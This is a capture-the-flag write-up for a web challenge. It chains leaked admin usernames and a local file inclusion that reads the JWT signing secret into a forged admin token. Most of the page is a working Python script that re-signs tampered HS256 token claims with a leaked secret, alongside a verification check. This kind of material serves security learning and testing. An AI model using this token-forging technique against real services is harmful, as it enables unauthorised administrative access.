Tags: tokens curl jwt lfi 


The page's source code leaks useful information, including the names of the admin users. We then send a request with Burp Suite and receive a JWT. Next we find an LFI, use it to read the secret the server signs tokens with, and modify the token's claims and re-sign it with that secret so that it authenticates us as admin. Then we get the flag!
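The forging step, as an added example that is not part of the original writeup: once the HMAC secret has been read through the LFI, the token handed out for a low-privilege user is decoded, its claims are changed, and the header.payload is re-signed with HS256 under the leaked secret. The secret value, the claim names (`user`, `role`) and the admin value are placeholders, since the writeup does not give them; the token format is standard JWT with a JSON header and payload, which is the only thing the code relies on. A `verify_jwt` helper is included to show the check the server performs, so you can confirm locally that the forged token passes it before sending it.

```python
import base64
import hashlib
import hmac
import json

# Placeholder, not the real secret from the challenge: this is whatever the
# LFI let you read from the server's configuration.
LEAKED_SECRET = b"example-secret-read-via-lfi"


def b64url_encode(data: bytes) -> str:
    # JWT uses unpadded base64url for all three segments.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Re-add the padding that JWT strips before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_json(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(signing_input: bytes, secret: bytes) -> str:
    # HS256 signature = HMAC-SHA256(secret, "<header>.<payload>")
    return b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())


def make_jwt(payload: dict, secret: bytes) -> str:
    """Mint a token the way the server would for a logged-in user."""
    h = encode_json({"alg": "HS256", "typ": "JWT"})
    p = encode_json(payload)
    return f"{h}.{p}.{sign_hs256(f'{h}.{p}'.encode(), secret)}"


def decode_jwt(token: str):
    """Split a token into (header dict, payload dict, signature string) without verifying it."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s


def verify_jwt(token: str, secret: bytes) -> bool:
    """Server-side check: recompute HS256 over header.payload and compare in constant time."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return False  # pin the algorithm; never let the token pick it ('none', RS256-as-HMAC)
    expected = sign_hs256(f"{h}.{p}".encode(), secret)
    return hmac.compare_digest(expected, s)


def forge_jwt(token: str, secret: bytes, overrides: dict) -> str:
    """Take the low-privilege token, change its claims, and re-sign with the leaked secret."""
    header, payload, _ = decode_jwt(token)
    forged_payload = {**payload, **overrides}
    h = encode_json(header)
    p = encode_json(forged_payload)
    signing_input = f"{h}.{p}".encode()
    return f"{h}.{p}.{sign_hs256(signing_input, secret)}"


if __name__ == "__main__":
    # Constructed sample: the token the server gave us as a normal user.
    guest_token = make_jwt({"user": "guest", "role": "user"}, LEAKED_SECRET)
    admin_token = forge_jwt(guest_token, LEAKED_SECRET, {"user": "admin", "role": "admin"})
    print("forged payload:", decode_jwt(admin_token)[1])
    print("passes server check:", verify_jwt(admin_token, LEAKED_SECRET))
```

The forged token is then replayed in place of the original, in whatever carrier the application used for the first one (an `Authorization: Bearer` header or a cookie; the writeup does not say which). If the secret you read through the LFI is wrong, `verify_jwt` fails locally before you burn requests against the target. The `alg` pin in `verify_jwt` is the defensive counterpart: with the secret leaked it does not help, but it is the check that stops the cheaper `alg: none` and key-confusion variants.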

Original writeup (https://youtu.be/tECywEsDpLQ).